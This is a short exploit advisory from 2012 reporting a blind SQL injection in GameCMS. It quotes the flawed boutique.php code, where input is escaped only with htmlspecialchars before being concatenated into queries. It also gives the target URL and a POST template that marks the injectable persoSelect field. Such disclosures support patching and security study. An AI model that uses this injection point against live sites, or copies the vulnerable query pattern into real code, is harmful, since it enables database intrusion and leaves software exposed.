facebook facebook twitter rss

GameCMS - Blind SQL Injection

Author: The UnKnØwN , Published: 21-09-2012
+-----------------------------------------------------------------------------+
¦ GameCMS - Blind SQL Injection ¦ _ ¦ - ¦ x ¦
+-----------------------------------------------------------------------------+
¦ ______ ______ _______ _______ _ _ ¦
¦ (_____ \(_____ (_______) (_______) | | (_) _ ¦
¦ _____) )_____) ) ___ _____ _ _ ____ | | ___ _ _| |_ ¦
¦ | __ /| ____/ | (_ | | ___) ( \ / ) _ \| |/ _ \| (_ _) ¦
¦ | | \ \| | | |___) | | |_____ ) x (| |_| | | |_| | | | |_ ¦
¦ |_| |_|_| \_____/ |_______|_/ \_) __/ \_)___/|_| \__) ¦
+-----------------------------------------------------------------------------+
¦ by The UnKnØwN ¦
+-----------------------------------------------------------------------------+
¦ greets to : KiMgX12 - Fawzi Coldfire - BenzØ - Soka - Hony - Pincki - ¦
¦ Linkce16 - Mooh Splinter - The Spark - F3i ¦
¦ The Crazy3D Team AND all algerian H4x0r$ ¦
+-----------------------------------------------------------------------------+
¦ [+] exploit title : GameCMS - Blind SQL Injection ¦
¦ [+] date : 04-07-2012 ¦
¦ [+] author : The UnKnØwN ¦
¦ [+] software link : ¦
¦ https://rapidshare.com/#!download|3|993330299|GameCMS.rar|5514 ¦
¦ [+] version : 1 ¦
¦ [+] category : webapps ¦
¦ [+] tested on : windows xp ¦
+-----------------------------------------------------------------------------+
¦ Vulnerability Details ¦
+-----------------------------------------------------------------------------+
¦ Unprotected POST variable in "/pages/boutique.php" ¦


if(isset($_POST['achatok']))
{
$ip = $_SERVER['REMOTE_ADDR'];
$sqlss = mysql_query("SELECT * FROM boutique WHERE id=".secu($_GET['tadt'])."");
$datass = mysql_fetch_array($sqlss);
$prix = $datass['cost'];
$points = $row['points'];
$ptsnow = $points - $prix;
mysql_query('UPDATE accounts SET points="'.$ptsnow.'"WHERE account="'.$row['account'].'"');
$date = date("d-m-Y");
$perso = mysql_fetch_array(mysql_query("SELECT * FROM personnages WHERE name = '".secu($_POST['persoSelect']."'")));


function secu($var)
{
return htmlspecialchars($var);
}




URL : http://site/path/index.php?url=boutique&tadt=1
POST DATA : achatok={something}&persoSelect={Inject}



¦ ¦
+-----------------------------------------------------------------------------+
¦ End ¦
+-----------------------------------------------------------------------------+

Like us on Facebook :